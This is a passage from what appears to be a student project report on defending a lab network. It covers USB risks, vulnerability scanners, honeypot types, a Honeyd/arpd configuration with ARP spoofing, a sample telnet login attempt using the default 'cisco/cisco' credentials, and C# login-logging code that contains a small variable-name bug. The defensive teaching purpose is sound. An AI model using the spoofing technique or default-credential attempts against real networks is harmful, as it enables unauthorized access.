• Viruses: Users can bring in infected documents from home, or take home a
business document to an infected PC, update it, and return it to a corporate file
server. Unless the company’s antivirus policies are very aggressive, and that all
files stored on the network are actively scanned, Flash Drives can present a new
vector for computer viruses that is nearly impossible to defend against. Most
Antivirus softwares operate "reactively" to threats and can only identify viruses
that have been previously identified. Therefore, a virus writer could theoretically
infect a corporate network by plugging a USB flash drive in any computer and
open the virus file.
• Malicious Software: In addition to viruses, users could bring in unauthorized
software or data files from home such as shareware programs, software pranks,
MP3 files, video clips and other files that may violate corporate policies.
Moreover, a user with bad intentions can bring in spy ware or keystroke loggers
that could enable him to capture passwords and other sensitive information.
• Data Theft: This includes corporate espionage, i.e. steeling secret and vital data
from the company’s server (like client lists, sales forecasts, research data…) in a
matter of few minutes and sell it to competitors, hackers…
73
A lot of measures can be done to prevent any misuse of USB flash drives, raging from
soft measures to hard security measures such as:
• Educating the users: it is important for the users of the network to know the
risks that such devices can present. Moreover, a company should establish a
policy for taking data out of the office, or bringing files from home.
• Enforce the lock desktop policy: essential measure if a user account has access
to sensitive data, to prevent any theft of data while user is away.
• Frequently update antivirus policies and actively scan network on regular
basis
• Restrict USB ports on desktop: USB devices cannot be managed using Group
Policy in Windows 2000 or XP. However, USB ports can be disabled on all
desktops or on desktops that have access to sensitive data. In doing so, the
administrator will need to make sure any peripherals in use (such as keyboards,
mice, scanners) use legacy ports instead of USB ports. Note that in most corporate
networks, printers are assigned to specialized network print servers and may not
be an issue. Also, 3rd party tools such as Secure Wave’s SecureNT software (that
we highly recommend) can allow businesses to control end user access to I/O
devices (including USB ports).
To disable the use of USB storage devices on a computer running Windows, the
following can be done [19]:
1. Open Windows Explorer or My Computer.
2. Navigate to the %SystemRoot%\Inf folder.
3. Right Click the Usbstor.pnf file and choose Properties.
74
4. Select the Security tab.
5. In the Group or user names list, select the user or group that you wish to
deny access to and check/uncheck the Deny box for each option: read,
write, read and write…
6. Press OK.
Alternatively, some companies ban the access to the E: or X: drive, which is the name of
the drive that is added when a USB flash drive is accessed. But this method is not
recommended as it can be bypassed easily.
4.3 Creating Common and User Files
To simulate a real company, we have created different sort of folders and files:
• A networked shared folder that can be accessible by any user with company files
(such as word documents with names, phone numbers…)
• A folder for each user that can only be accessed by the concerned user, with excel
sheets, word documents, pictures, etc… to simulate a real life business situation.
On of the main aim of the hackers’ team will be to steal the data in those files, change it,
create new fake files, etc… Off course, these files were backed-up daily, so in case the
hackers delete/edit them, vital company information will not be lost.
4.4 Scanning the Network and Updating Security
A lot of free ware tools, or software tools that are available on trial versions can be found
on the internet. They are very useful to administrators as they perform network scans and
detect any vulnerability in the network. We have used them whenever possible (i.e.
whenever available for free or in trial version) to enhance our network security.
75
4.4.1 Linux Tools
• PortSentry: this tools monitors network probes and attacks against the server. It
can also be configured to log and counter these probes and attacks. See appendix
for detailed steps.
• CHKROOTKIT: this tool can be downloaded at www.chkrootkit.org. It scans
the system for known exploits, Trojan commands, and worms used to
compromise a system. Usually, CHKROOTKIT does not perform very well when
PortSentry is also being used.
• Nessus: Nessise searches and localizes vulnerabilities on the system by actively
trying to perform known exploits against the system. When vulnerabilities are
found, it makes recommendations about upgrades and configuration changes. The
software is available at http://nessus.org.
4.4.2 Windows Tools
The main tool we used to scan our Windows server and network domain was GFI
Languard (available in free, 15 days trial version). This program basically scans the
network for missing patches, services packs, open ports and other vulnerabilities and
recommends solutions to those vulnerabilities. By running Languard, we were able for
example to notice that some vital patches for network security were missing.
Also, we have found a useful tool called EventAlarm (available in free 30 days trial
version) that gives messages, or alarms, to the administration, whenever something
76
specified has taken place. For example, the administrator can set EventAlarm to give a
message every time a user logs in, or every time a computer in the network crashes or has
problems. In this way, monitoring the network can be easier.
4.5 Confusing the Hackers: Honey Pots
4.5.1 What is a Honeypot
Honeypots are a new technology for the network security industry whose value, unlike
most security tools designed to defend and protect a computer network, lies in being
probed, attacked, or compromised. Honeypots expect no data, so any traffic to or from it
is most likely unauthorized activity. There are two general types of honeypots:
production and research. Production honeypots are easy to use, capture only limited
information, and used primarily by companies or corporations. Production honeypots are
used to protect a network, they directly help secure an organization’s network. Research
honeypots are different; they are used to collect information. Research honeypots are
complex to deploy and maintain, capture extensive information, and used primarily by
research, military, or government organizations. Neither solution is better than the other,
it all depends on what we want to achieve. From now on, we will concentrate on
production honeypots since they are the ones relevant to our FYP being used for
protection purposes. We will use the word honeypot in the sense of production honeypot
from now on. Honeypots are not limited to solving only one problem, they have a number
of different applications. For prevention, honeypots can be used to slow down or stop
automated attacks. For example, the honeypot LaBrea Tarpit is used slow down
77
automated TCP attacks, such as worms. But in general, honeypots are not effective
prevention mechanisms. Against human attackers, honeypots can utilize psychological
weapons such as deception or discouragement to confuse or stop attacks. Honeypots can
also be used to detect unauthorized activity, they excel at this capability due to their
advantages. Traditional detection solutions can flood organizations with alerts, yet only a
few of the alerts signal valid attacks. Also, many of today's technologies are not designed
to detect unknown attacks. Honeypots help resolve both of these problems. Honeypots
generate very few alerts, but when they do it is almost sure that something malicious has
happened. Honeypots can also detect and capture unknown attacks as well as known
attacks. Finally, honeypots can be used to respond to an attack. If an attacker breaks into
an organization, and one of the systems he broke into was a honeypot, then information
gathered from that system can be used to respond to the break-in. Honeypots can also be
used to identify an attacker once he is in an organization’s network. They can operate on
any variety of computer systems and just about any type of computer. While most public
domain software for setting up a honeypot is written for UNIX, many of these systems
have already been ported to Windows. [20]
4.5.2 Classifications of Honeypots
Levels of Interaction
We have already talked about classification based on functionality (production and
research honeypots) in the honeypot definition above. In this section, we will classify
honeypots by level of interaction. When dealing with honeypots there is a direct
correlation between the amount of data that can be collected and the amount of damage
that can be done by an attacker. The more information the honeypot is able to collect the
78
greater the risk, the complexity and the level of interaction. We mean by risk, the chance
that an attacker can use the honeypot to harm, attack, or infiltrate other systems or
organizations.
Low Interaction Honeypots
A low interaction honeypot is one that is easy to install, configure, deploy, and maintain.
Because the attacker can do less than he might with other higher interaction honeypots, it
is less risky to implement. Low interaction honeypots do not allow the attacker access to
an operating system from which he might attack other systems, which also significantly
reduces risk. Low interaction honeypots are normally production honeypots, as they are
used to protect an organization. Since low interaction honeypots restrict an attacker's
activity, they are limited in the amount of information they can give about an attacker.
The information received from this type of honeypot is usually restricted to the the time
and date of attack, the source IP address and source port of the attack and the destination
IP address and destination port of the attack. An example of a low interaction honeypot is
BackOfficer Friendly (BOF). BackOfficer Friendly emulates a limited number of
services. By limiting the number of services, the attacker is restricted to how much he can
interact with the honeypot. BackOfficer Friendly will be discussed in greater detail in the
next section. The honeypot allows an attacker to connect to a port and attempt to execute
a restricted number of commands, after which the attacker is disconnected.
79
Figure 4.1: BackOfficer Friendly detecting an unauthorized connection
Medium Interaction Honeypots
Medium interaction honeypots offer attackers more ability to interact than low interaction
honeypots, but less than those considered high interaction. They are usually more time-
consuming to install and configure as they normally involve a high level of development
and customization from an organization. As attackers have an increased ability to interact
with this type of honeypot, more caution must be used to ensure that the attacker does not
have access to other systems. An example of a medium interaction honeypot would be
the use of the jail. This functionality allows an administrator to partition an operating
system environment, creating a virtual operating system within a real operating system.
The virtual operating system can be controlled by the real operating system, but gives the
appearance and feel of a true operating system. The goal is for an attacker to attack and
gain access to the jailed environment, and then the attacker's activities can be heavily
monitored or controlled from the real or master operating system. A medium interaction
honeypot is more complicated to deploy and comes with a higher risk, increasing the
chance that something may go wrong. However, with greater risk comes greater reward;
80
medium interaction honeypots may be configured to allow the administrator to gather
types of attacks information data.
High Interaction Honeypots
High interaction honeypots are most often research honeypots. They are used, at a great
amount of risk, to gather large amounts of information about attackers. The goal of a high
interaction honeypot is to give the attacker access to a real operating system where
nothing is emulated or restricted. High interaction honeypots give users the opportunity
to capture the tools, monitor the activity, and even learn how hackers communicate with
one another. Since this type of honeypot allows the attacker to interact with a real
operating system there is the possibility that an attacker might use the honeypot to attack
other computers. In order to ensure that this does not take place, high interaction
honeypots need to be placed within a controlled environment that restricts the ability of a
hacker to launch attacks from within. One of the difficulties in maintaining this type of
architecture is to not allow the attacker to realize that he is being monitored in a
controlled environment. Because of the amount of risk involved and the complexity in
their implementation, high-interaction honeypots may be extremely difficult to configure,
install, and maintain. Nevertheless, they are the best resource for studying the hacker
community as well as for capturing worms and viruses for analysis.
81
4.5.3 Review of most popular Honeypots Low Interaction
A- BackOfficer Friendly
http://www.nfr.com/products/bof/
B- Specter
http://www.specter.com
C- Honeyd
http://www.citi.umich.edu/u/provos/honeyd/
D- Decoy Server
http://www.recourse.com
E- Honeynets
High interaction http://project.honeynet.org/papers/honeynet/
A- BackOfficer Friendly (BOF)
BackOfficer Friendly is a low interaction honeypot developed by NFR Security Inc that
can run on almost any Windows-based platform to include Windows 95 and Windows
98. Back Officer Friendly was originally created to detect when anyone attempts a Back
Orifice scan against a computer. Back Orifice is a remote control trojan penetration
application from which a hacker can for example access files on the infected computer,
send msgs, open and close the CD-drive etc... Much like a computer virus, it is
distributed as an embedded program within downloadable shareware utilities and
executable greeting card programs. When the user opens the downloaded file Back
Orifice installs itself on the user's machine and allows the attacker complete control of
the computer through the Internet connection. It has since evolved to detect attempted
connections to other services, such Telnet, FTP, SMTP, POP3 and IMAP2. When BOF
82
receives a connection to one of these services, it will fake replies to the hopeful hacker,
wasting the attacker's time, and will give us time to stop them from other harms.
Basically, it pretends to be a Back Orifice server for example, BackOfficer Friendly gives
the attacker false answers that look like they came from Back Orifice, while logging the
attackers IP address and the operations they attempted to perform. So, BackOfficer
Friendly is a spoofing server application which notifies whenever someone attempts to
remote control a system.
Figure 4.2- BOF screen capture showing spoofed services
Figure 4.3: BOF warnings
83
B- Specter
SPECTER is a smart honeypot or deception system. It simulates a complete machine,
providing an interesting target to lure hackers away from the production machines.
SPECTER offers common Internet services such as SMTP, FTP, POP3, HTTP and
TELNET which appear perfectly normal to the attackers but in fact are traps for them to
mess around and leave traces without even knowing that they are connected to a decoy
system, which does none of the things it appears to do, but instead logs everything and
notifies the appropriate people. Furthermore, SPECTER automatically investigates the
attackers while they are still trying to break in. SPECTER provides massive amounts of
luring content and it generates luring programs that will leave hidden marks on the
attacker's computer. Automated weekly online updates of the honeypot's content and
vulnerability databases allow the honeypot to change constantly without user interaction.
Like BOF, Specter is a low interaction honeypot that offers no operating system for the
attacker to access. Yet, Specter offers far more functionality, including the ability to
monitor more services and to more realistically emulate the applications. Additionally,
the system may be configured to emulate vulnerabilities, making it more attractive to
hackers, and to even deliver bogus information to a hacker during an attack.
Specter may be configured to have five different "personalities" or characters:
• Open: The system behaves like a badly configured system in terms of security.
• Secure: The system behaves like a well-configured system in terms of security.
84
• Failing: The system behaves like a machine with various hard and software
problems.
• Strange: The system behaves unpredictably and leaves the intruder wondering
what is going on.
• Aggressive: The system communicates as long as necessary to collect information
about the attacker, then reveals its true identity by the appropriate means,
depending on the kind of connection, and then ends communication. This is very
handy to scare intruders away.
These personalities encourage the attacker to continue to interact with the honeypot and
therefore increase the amount of information available to the administrator. [21]
85
Figure 4.4: Specter GUI
C- Honeyd
Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be
configured to run arbitrary services, and their personality can be adapted so that they
appear to be running certain operating systems. Honeyd enables a single host to claim
multiple addresses
The different TCP personalities are learned from reading a nmap fingerprint file. The
configured personality is the operating system that nmap or xprobe will return.
Personalities can be annotated to determine if they allow FIN-scans for open ports or to
86
select the preference in which they reassemble fragmented IP packets. Honeyd can be
used to create a virtual honey net or for general network monitoring. It supports the
creation of a virtual network topology including dedicated routes and routers. The routes
can be attributed with latency and packet loss to make the topology seem more realistic.
[22]
D- Decoy Server
By creating a realistic mock network environment, the solution serves as an attack target
in order to protect critical areas of the network. As a supplement to security solutions
such as firewalls, it employs advanced decoy technology to enable early warning and
detection to divert and confine attacks. Symantec Decoy Server sensors deliver detection
and response and provide detailed information through its system of data collection
modules. Every action is recorded for analysis, allowing administrators to understand the
threat and implement an appropriate, policy-based response. Advanced filters enable the
solution to automatically discard insignificant events, leaving only the data required to
respond effectively to any incident. Decoy Server creates a jailed environment in which
attackers have access to virtual cages as opposed to limited operating systems. The cages
are controlled environments from which the attacker is unable to escape. Decoy Server is
able to create up to four of these cages on a single system. Being a high interaction
honeypot, Decoy Server is able to capture much more information about attacks, but, as
mentioned earlier, this comes with an increased risk. The greatest risk is that, once
attacked, the system will be used to attack other systems. Another risk is in the
complexity of administrating the Decoy Server. Errors made in the configuration process
or during system maintenance increase the chance that something may go wrong during
87
implementation. Of course, the greatest concern is that the attacker may be able to
capitalize on an error made by the administrator or compromise the system to such a
degree that they are able to attack the host operating system. [23]
Figure 4.5: A possible deployment of Decoy Server.
E-Honeynets
A honeynet is a type of honeypot which has high interaction and is designed primarily for
research. It is through this extensive interaction we gain information on threats, both
external and internal to an organization. What makes a honeynet different from most
honeypots is that it is an entire network of systems. Instead of a single computer, a
honeynet is a network of systems desinged for attackers to interact with. These victim
systems (honeypots within the honeynet) can be any type of system, service, or
information we want to provide. Its is this flexibility that gives honeynets their true
power.
88
The common elements of a honeynet are:
A firewall computer: which logs all incoming/outgoing connections and provides NAT
(network address translation) service and some Denial of Service protection.
An intrusion detection (IDS) computer: The IDS box is sometimes on the same box as
the firewall, but it should be on an entirely separate computer that can see all of the
network traffic. It also logs all the network traffic and looks for known exploits and
attacks.
A remote System Log computer: the honeypot is slightly modified so that all commands
an intruder would use are sent to System Log. System Log is then set to remote log to the
remote System Log box.
The honeypot itself: The honeypot can be anything from a default Redhat 6.2 installation
to a mirror of one of our production systems.
One of the unique features of a honeynet is that, rather than emulating a single system
like BOF and Specter or multiple systems like Honeyd and Decoy Server, it is actually a
network of standard production systems. The systems are put behind some type of access
control device and monitored for activity.
89
Figure 4.6: Honeynet architecture
Honeynets are clearly the riskiest of the honeypot solutions. Once an attacker gains
access to a complete operating system, available in the honeynet, there are no limitations
as to what they may be able to do to the system. They may use the system to compile
code, communicate with other hackers, distribute tools, or launch attacks on other
systems. The only thing restricting the hacker's activities is the access control device on
the outside of the honeypots. Another concern, is the complexity involved in configuring
and maintaining a honeynet. Rules have to be established for all incoming and outgoing
connections. System logs must capture all activity and forward it to a remote log server
for review by the administrator. Any error in these configurations could expose the
honeynet and its associated network and administrator to increased risk. [24]
90
4.5.4 Our selection and work
We chose to install honeyd on our network because it has the highest interaction between
the low interaction honeypots. It has many features and is relatively simple to use. It has a
Unix and Windows version. Since it is open source we can emulate our own services on
it. The primary purpose of Honeyd is detection, specifically to detect unauthorized
activity within an organization. It does this by monitoring all the unused IPs in a network.
Any attempted connection to an unused IP address is assumed to be unauthorized or
malicious activity. For example, if a network has a class C address, it is unlikely that
every one of those 254 IP addresses is being used. Any connection attempted to one of
those unused IP addresses is most likely a probe, a scan, or a worm hitting the network.
Honeyd can monitor all of these unused IPs at the same time. Whenever a connection is
attempted to one of them, Honeyd automatically assumes the identity of the unused IP
addresses and then interacts with the attacker. This approach to detection has many
advantages over traditional methods. Any time Honeyd generates an alert, it most likely
is a real attack, not a false alarm. Henyd also not only detects known attacks, but
unknown ones as well. By default, Honeyd can detect (and log) any activity on any UDP
or TCP port, as well as some ICMP activity. We can also create with honeyd emulated
services that interact with the attacker. These emulated services determine what the
attacker is attempting to do, what they are looking for. We can do this by creating scripts
that listen on specific ports and then interact with attackers in a predetermined manner.
For example, we can create an FTP script that emulates a wu-ftpd daemon on Linux, or a
Telnet connection on a Cisco router. These emulated services are limited because they act
91
in a predetermined behavior. The script can be written in almost any language, such as
Perl, Shell, or Expect. Below is an example of a service emulating a Cisco router.
attacker $telnet 192.168.1.150
Trying 192.168.1.150...
Users (authorized or unauthorized) have no explicit or
implicit expectation of privacy. Any or all uses of this
system may be intercepted, monitored, recorded, copied,
audited, inspected, and disclosed to authorized site,
and law enforcement personnel, as well as to authorized
officials of other agencies, both domestic and foreign.
By using this system, the user consents to such
interception, monitoring, recording, copying, auditing,
inspection, and disclosure at the discretion of authorized
site.
Unauthorized or improper use of this system may result in
administrative disciplinary action and civil and criminal
penalties. By continuing to use this system you indicate
your awareness of and consent to these terms and conditions
of use. LOG OFF IMMEDIATELY if you do not agree to the
conditions stated in this warning.
User Access Verification
Username: cisco
Password:
92
% Access denied
The honeyd log of the attack would look like this:
Jan 3 11:23:32 marge honeyd[22885]: Connection request: (192.168.1.10:2783 -
192.168.1.150:23)
Jan 3 11:23:32 marge honeyd[22885]: Connection established:(192.168.1.10:2783 -
192.168.1.150:23) <-> /usr/bin/perl scripts/router-telnet.pl
Jan 3 11:23:42 marge honeyd[22885]: E(192.168.1.10:2783 - 192.168.1.150:23):
Attempted login: cisco/cisco
Jan 3 11:23:47 marge honeyd[22885]: Connection dropped with reset:
(192.168.1.10:2783 - 192.168.1.150:23)
To implement Honeyd we need to compile and use two tools: Arpd and Honeyd. Honeyd
cannot do everything alone and requires the help of Arpd. Arpd is used for ARP
spoofing; this is what actually monitors the unused IP space and directs attacks to the
Honeyd honeypot. Honeyd does not have the capability to direct attacks to it, it only has
the capability to interact with attackers. The commands to start both are listed below. The
networks in the below code are the networks that Arpd will monitor and Honeyd will
interact with. In this example, the honeypot monitors all unused IP space in the
192.168.1.0/24 network.
arpd 192.168.1.0/24
honeyd -p nmap.prints -f honeyd.conf 192.168.1.0/24
93
So, based on the command above, the Arpd process will monitor any unused IP space on
the 192.168.1.0/24 network. If it sees any packets going to unused IP's, it will direct those
packets to the Honeyd honeypot using Arp spoofing, a layer two attack. Its spoofs the
victim's IP address with the MAC address of the Honeypot. For the Honeyd command, -
p nmap.prints refers to the Nmap fingerprint database. This is the actual database that
the scanning tool Nmap uses to fingerprint operating systems. We can get the latest
Nmap fingerprint database from Nmap. The second option for the Honeyd process, -f
honeyd.conf, is the honeypot configuration file. This determines how we want the
honeypot to behave.
## Honeyd configuration file ##
### Windows computers (default)
create default
set default personality "Windows NT 4.0 Server SP5-SP6"
set default default tcp action reset
add default tcp port 110 "sh scripts/pop.sh"
add default tcp port 80 "perl scripts/iis-0.95/main.pl"
add default tcp port 25 block
add default tcp port 21 "sh scripts/ftp.sh"
add default tcp port 22 proxy $ipsrc:22
add default udp port 139 drop
set default uptime 3284460
### Cisco router
create router
94
set router personality "Cisco 4500-M running IOS 11.3(6) IP Plus"
add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl"
set router default tcp action reset
set router uid 32767 gid 32767
set router uptime 1327650
# Bind specific templates to specific IP address
# If not bound, default to Windows template
bind 192.168.1.150 router
We start off with by creating different types of computers we want to emulate
(templates). These templates define the behavior of each emulated operating system. In
this configuration file we have created two different emulated computers: default and
router. The first thing we need to do in each template is assign the "personality"; this is
what operating system will emulate at the IP stack level. We give it the OS type using the
same description in the Nmap fingerprint database. In the above example, for the
template default, we have assigned the personality "Windows NT 4.0 Server SP5-SP6"
and for the template router we have given it the personality "Cisco 4500-M running IOS
11.3(6) IP Plus". Note, the personality does not affect the behavior of the emulated
services, it only modifies the behavior of the IP stack. For the emulated services, we have
to select different scripts based on what type of OS we want to emulate. If our personality
is Windows, it is not intelligent to bind an emulated Apache script to the HTTP port.
Instead, we would bind an emulated IIS script to the HTTP port.
The next step is to define the behavior of each port. We can either assign specific ports
specific behavior, or define general behavior. In the abve example, in the template default
95
all the TCP ports are assigned the behavior reset, so they respond with a RST to any
connection attempts (for UDP, ICMP port unreachable). Other options are open (will
respond with ACK, or for UDP nothing) or block (will not respond for both TCP and
UDP).
Once we have created our templates, we have to decide which IP addresses are bound to
which template. Using the bind command, as we do in the router template, we can bind
the template to specific IP addresses. In this case, if anyone attempts to connect to IP
address 192.168.1.150, they will be interacting with the Honeyd honeypot using the
router template. The default template is a key template to Honeyd. The template with the
name default becomes the default for all other connections to non-used IP space. So if
any connections are made to any unused IP space in the 192.168.1.0/24 network, they
will get a Windows box emulated by Honeyd, except for the IP 192.168.1.150, at which
they will get the Cisco router.
During our implementation of the above mentioned procedures we faced some
difficulties. First of all, nmap was not installed on the fedora workstations so we had to
install it. Second, we had to get some missing libraries in order to compile honeyd
(libevent - an asynchronous event library, libdnet - the network library, libpcap - a packet
capture library).
4.6 User Logs
In order to monitor the users logging on the network we decided to write a code that
records and stores all the logins and logouts of all users with their respective times and
dates. This software is written in C#.net and will help us trace an internal attack to the
user behind it by checking the application for the last logged in user. Instead of reading
96
the logs from the standard windows log file which is susceptible to change by any novice
internal attacker we used the “System.Security.Principal” library in order to get the
username and domain of each logged user. The general idea of the code is to obtain the
username, domain and cloktime from the system send them through sockets to the server
where they are stored in a file and are ready for display.
The software consists of two applications: the server application and the client
application.
Client application:
The task of this application is to get the username and domain and send them to the
server application.
The libraries used in this application to provide us with the necessary tools where
“System.Security.Principal”, “System.Net”, “System.Net.Sockets”.
“System.Security.Principal”: This library was useful because it contains the
WindowsIdentity class which in its turn contains the GetCurrent() function specified for
getting the username and domain. The function use is illustrated in the code below:
WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString()+" "+user.User.ToString()+" "+DateTime.Now.ToString()); socClient.Send(byData); “System.Net”: This library allows us to specify the destination ip addresses and endpoints
and to specify the protocol type.
“System.Net.Sockets”: this library is used to create new sockets through which the data
“byData” is sent to the destination ip.
97
class SocketPkt { public System.Net.Sockets.Socket socket; public byte[] dataBuffer = new byte[1024]; }
Full Client Application Code:
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.Net; using System.Net.Sockets; using System.Security.Principal; namespace TestClient { public partial class MainForm : Form { private Socket socClient; private string serverIP = "192.168.1.101"; private int serverPort = 54323; private IAsyncResult asynResult; public AsyncCallback fnCallBack = null; public MainForm() { InitializeComponent(); try { socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); IPAddress ipAdd = IPAddress.Parse(serveIP); IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort); socClient.Connect(serverEP); WaitForData(); } catch (SocketException se) { MessageBox.Show(se.Message, "Unable to Connect to Server"); } try { WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(Environment.NewLine+ "*UserName: "
98
+ user.Name.ToString() + " " + "Login Time: " + " " + DateTime.Now.ToString()); socClient.Send(byData); } catch { } } public void WaitForData() { if (fnCallBack == null) { fnCallBack = new AsyncCallback(OnDataReceived); } SocketPkt socketPkt = new SocketPkt(); socketPkt.socket = socClient; asynResult = socClient.BeginReceive(socketPkt.dataBuffer, 0, socketPkt.dataBuffer.Length, SocketFlags.None, fnCallBack, socketPkt); } public void OnDataReceived(IAsyncResult asyn) { try { SocketPkt socketPkt = (SocketPkt)asyn.AsyncState; int iRx = 0; iRx = socketPkt.socket.EndReceive(asyn); char[] chars = new char[iRx + 1]; Decoder d = Encoding.UTF8.GetDecoder(); int charLen = d.GetChars(socketPkt.dataBuffer, 0, iRx, chars, 0); string strData = new string(chars); parseReceivedData(socketPkt.socket, strData); WaitForData(); } catch (ObjectDisposedException) { System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n"); } catch (SocketException se) { MessageBox.Show(se.Message); } } private void parseReceivedData(Socket socket, string data) { //String szData = "Again"; //byte[] byData = System.Text.Encoding.ASCII.GetBytes(szData); //socClient.Send(byData); } private void btnConnect_Click(object sender, EventArgs e) {
99
try { socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); IPAddress ipAdd = IPAddress.Parse(serverIP); IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort); socClient.Connect(serverEP); WaitForData(); } catch (SocketException se) { MessageBox.Show(se.Message, "Unable to Connect to Server"); } } private void btnClose_Click(object sender, EventArgs e) { socClient.Disconnect(false); socClient.Close(); } private void btnSend_Click(object sender, EventArgs e) { WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString()+" "+user.User.ToString()+" "+DateTime.Now.ToString()); socClient.Send(byData); } private void MainForm_FormClosed(object sender, FormClosedEventArgs e) { try { if (e.CloseReason == CloseReason.WindowsShutDown) { WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes("UserName: " + user.Name.ToString() + " " + "Logout Time :" + " " + DateTime.Now.ToString()); socClient.Send(byData); } } catch { } } } }
100
Server Application:
The task of this application is to receive he data sent by the client application sent over
TCP/IP , store this data into a log file and display them at h user’s will.
The libraries used in this application to provide us with the necessary tools where “
“System.Net”, “system.IO”, system.Net.Sockets”.
“System.Net”: This library allows us to specify the destination ip addresses and endpoints
and to specify the protocol type.
“System.Net.Sockets”: This library is used to create new sockets through which each
logged in user is assigned a socket of his own.
class SocketPkt { public System.Net.Sockets.Socket socket; public byte[] dataBuffer = new byte[1024]; public bool isActive = false; }
“System.IO”: Used to stream read and write from and onto files
StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII);
Server Application Output Format: (Figure 4.7)
101
N.B. The clear button clears the display but the Log file remains intact.
Full Server Application Code:
using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.Net.Sockets; using System.Net; using System.IO; namespace Server_akiki { public partial class Server : Form { private Socket socListener = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); private int serverPort = 54323; static private int maxConnections = 1000; private SocketPkt[] clientSocket = new SocketPkt[maxConnections]; private AsyncCallback fnCallBack = null; private IAsyncResult asynResult;
102
public Server() { InitializeComponent(); FillList(); for (int i = 0; i < maxConnections; i++) { clientSocket[i] = new SocketPkt(); } Start(); } private void FillList() { StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII); while (!sr.EndOfStream ) { string x = sr.ReadLine(); if(x!= "" ) LogList.Items.Add(x); } sr.Close(); } //private void Start_Click(object sender, EventArgs e) //{ // for (int i = 0; i < maxConnections; i++) // { // clientSocket[i] = new SocketPkt(); // } // Start(); //} private void Start() { try { IPEndPoint ipLocal = new IPEndPoint(IPAddress.Any, serverPort); socListener.Bind(ipLocal); socListener.Listen(maxConnections); socListener.BeginAccept(new AsyncCallback(OnClientConnect), null); } catch (SocketException se) { Console.Write(se.Message); } } public void OnDataReceived(IAsyncResult asyn) {
103
int idx = (int)asyn.AsyncState; try { int iRx = 0; iRx = clientSocket[idx].socket.EndReceive(asyn); char[] chars = new char[iRx + 1]; Decoder d = Encoding.UTF8.GetDecoder(); int charLen = d.GetChars(clientSocket[idx].dataBuffer, 0, iRx, chars, 0); string strData = new string(chars); if (strData.EndsWith("\0")) strData = strData.Substring(0, strData.Length - 1); WriteDataToFile(strData); WaitForData(idx); } catch (ObjectDisposedException) { System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n"); } catch (SocketException se) { if (clientSocket[idx].socket.Connected) { Console.Write("OnDataReceived: " + se.Message); } else { clientSocket[idx].isActive = false; } } } private void WriteDataToFile(string strData) { LogList.Items.Add(strData); LogList.Refresh(); try { StreamWriter swr = new StreamWriter("C:\\Log.txt", true, Encoding.ASCII); swr.WriteLine(strData+ "\n"); swr.Close(); } catch (Exception ex) { MessageBox.Show(ex.ToString());} } public void WaitForData(int idx) { if (fnCallBack == null) { fnCallBack = new AsyncCallback(OnDataReceived);
104
} asynResult = clientSocket[idx].socket.BeginReceive(clientSocket[idx].dataBuffer, 0, clientSocket[idx].dataBuffer.Length, SocketFlags.None, fnCallBack, idx); } public void OnClientConnect(IAsyncResult asyn) { try { int idx = getFirstInactive(); clientSocket[idx].socket = socListener.EndAccept(asyn); clientSocket[idx].isActive = true; socListener.BeginAccept(new AsyncCallback(OnClientConnect), null); WaitForData(idx); } catch (ObjectDisposedException) { System.Diagnostics.Debugger.Log(0, "1", "\n OnClientConnection: Socket has been closed\n"); } catch (SocketException se) { Console.Write("OnClientConnect: " + se.Message); } } private int getFirstInactive() { for (int i = 0; i < maxConnections; i++) { if (!clientSocket[i].isActive) { return i; } } return -1; } private void sendData(int socketIdx, string strData) { byte[] byData = System.Text.Encoding.ASCII.GetBytes(strData); clientSocket[socketIdx].socket.Send(byData); } public void BroadCastData(string strData, string Quote) { } private void Clear_Click(object sender, EventArgs e) { if (LogList.SelectedItems.Count != 0) LogList.ClearSelected(); else
105
LogList.Items.Clear(); } } }
5. Countering the Attacks
Now that the network was ready and secured, it was time to counter the attacks
performed by the hackers’ team. They started attacking externally, and they were then
given a user account to attack internally.
5.1 First Attack
The first attack was performed in the first week of May. None of our scanners and event
alarms pinpointed it, but we discovered what had been done by social engineering (some
colleagues were assisting the hackers’ team, and told us about the attack).
When the hackers could not log in from the outside (due to firewall security), they
plugged their computer on one of our switch’s ports, i.e. on the internal network, and
performed an extensive scan.
Although such an attack was not meant to happen, as it did not follow some pre-set
guidelines, we still searched for a way to prevent it.
We decided that the best way to prevent non-users is preventing foreign MAC/ip
addresses from accessing the network from without or within. Our firewall does not
support software platforms but others higher in caliber routers (10/100 4-Port VPN Router (RV042))
can accommodate such platforms like openRG which allows you to manually configure
your firewall. After downloading this software on the router you will not only be able to
have a secure and sophisticated firewall but you will also have control over your internal
106
LAN ips and MAC addresses. Before going deep in the calibration of a firewall we will
give a general view of the firewall mechanism, the firewall rules and the firewall chains
and then give example on each of the last two.
Firewall Mechanism
The firewall configuration is a set of:
• Firewall rules (rule set)
• Firewall active devices
• Firewall configuration flags
The firewall rule set is a set of firewall rules that are represented in firewall opcodes for
execution by the kernel (data-path module) for each packet the firewall traversals.
The rules source:
• The user, through the different tabs in the security screen.
• The user, when configuring general definitions that have an effect on the firewall.
For example, changing the security level (High/Typical/Maximum), adding or
removing the firewall from a device, or changing the route level of a device
(NAT/NAPT/ROUTE).
• Tasks that present the need to open a port in the firewall, like the PPTP or IPsec
servers.
• The firewall itself, to block security hazards packets.
